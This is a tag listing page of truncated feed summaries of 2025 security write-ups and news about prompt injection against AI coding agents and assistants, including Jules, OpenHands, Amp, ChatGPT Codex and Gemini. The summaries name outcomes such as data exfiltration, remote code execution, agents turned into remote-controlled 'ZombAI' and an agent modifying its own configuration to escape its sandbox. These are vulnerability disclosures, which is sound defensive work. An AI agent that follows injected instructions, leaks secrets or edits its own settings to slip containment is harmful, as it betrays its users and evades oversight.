Tag: prompt injection attack

  • Embrace The Red: Jules Zombie Agent: From Prompt Injection to Remote Control

    Source URL: https://embracethered.com/blog/posts/2025/google-jules-remote-code-execution-zombai/ Source: Embrace The Red Title: Jules Zombie Agent: From Prompt Injection to Remote Control Feedly Summary: In the previous post, we explored two data exfiltration vectors that Jules is vulnerable to and that can be exploited via prompt injection. This post takes it further by demonstrating how Jules can be convinced to…

  • Embrace The Red: OpenHands ZombAI Exploit: Prompt Injection To Remote Code Execution

    Source URL: https://embracethered.com/blog/posts/2025/openhands-remote-code-execution-zombai/ Source: Embrace The Red Title: OpenHands ZombAI Exploit: Prompt Injection To Remote Code Execution Feedly Summary: Today we have another post about OpenHands from All Hands AI. It is a popular agent, initially named “OpenDevin”, and recently the company also provides a cloud-based service. Which is all pretty cool and exciting. Prompt…

  • Embrace The Red: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets

    Source URL: https://embracethered.com/blog/posts/2025/openhands-the-lethal-trifecta-strikes-again/ Source: Embrace The Red Title: OpenHands and the Lethal Trifecta: Leaking Your Agent’s Secrets Feedly Summary: Another day, another AI data exfiltration exploit. Today we talk about OpenHands, formerly referred to as OpenDevin initially. It’s created by All-Hands AI. OpenHands renders images in chat, which enables zero-click data exfiltration during prompt injection…

  • The Register: Infosec hounds spot prompt injection vuln in Google Gemini apps

    Source URL: https://www.theregister.com/2025/08/08/infosec_hounds_spot_prompt_injection/ Source: The Register Title: Infosec hounds spot prompt injection vuln in Google Gemini apps Feedly Summary: Not a very smart home: crims could hijack smart-home boiler, open and close powered windows and more. Now fixed Black hat A trio of researchers has disclosed a major prompt injection vulnerability in Google’s Gemini large…

  • Embrace The Red: Amp Code: Arbitrary Command Execution via Prompt Injection Fixed

    Source URL: https://embracethered.com/blog/posts/2025/amp-agents-that-modify-system-configuration-and-escape/ Source: Embrace The Red Title: Amp Code: Arbitrary Command Execution via Prompt Injection Fixed Feedly Summary: Sandbox-escape-style attacks can happen when an AI is able to modify its own configuration settings, such as by writing to configuration files. That was the case with Amp, an agentic coding tool built by Sourcegraph. The…

  • Embrace The Red: Turning ChatGPT Codex Into A ZombAI Agent

    Source URL: https://embracethered.com/blog/posts/2025/chatgpt-codex-remote-control-zombai/ Source: Embrace The Red Title: Turning ChatGPT Codex Into A ZombAI Agent Feedly Summary: Today we cover ChatGPT Codex as part of the Month of AI Bugs series. ChatGPT Codex is a cloud-based software engineering agent that answers codebase questions, executes code, and drafts pull requests. In particular, this post will demonstrate…

  • Cisco Talos Blog: Using LLMs as a reverse engineering sidekick

    Source URL: https://blog.talosintelligence.com/using-llm-as-a-reverse-engineering-sidekick/ Source: Cisco Talos Blog Title: Using LLMs as a reverse engineering sidekick Feedly Summary: LLMs may serve as powerful assistants to malware analysts to streamline workflows, enhance efficiency, and provide actionable insights during malware analysis.  AI Summary and Description: Yes **Summary:** The text provides an in-depth analysis of using Large Language Models…

  • Wired: Hackers Are Finding New Ways to Hide Malware in DNS Records

    Source URL: https://arstechnica.com/security/2025/07/hackers-exploit-a-blind-spot-by-hiding-malware-inside-dns-records/ Source: Wired Title: Hackers Are Finding New Ways to Hide Malware in DNS Records Feedly Summary: Newly published research shows that the domain name system—a fundamental part of the web—can be exploited to hide malicious code and prompt injection attacks against chatbots. AI Summary and Description: Yes Summary: The text discusses the…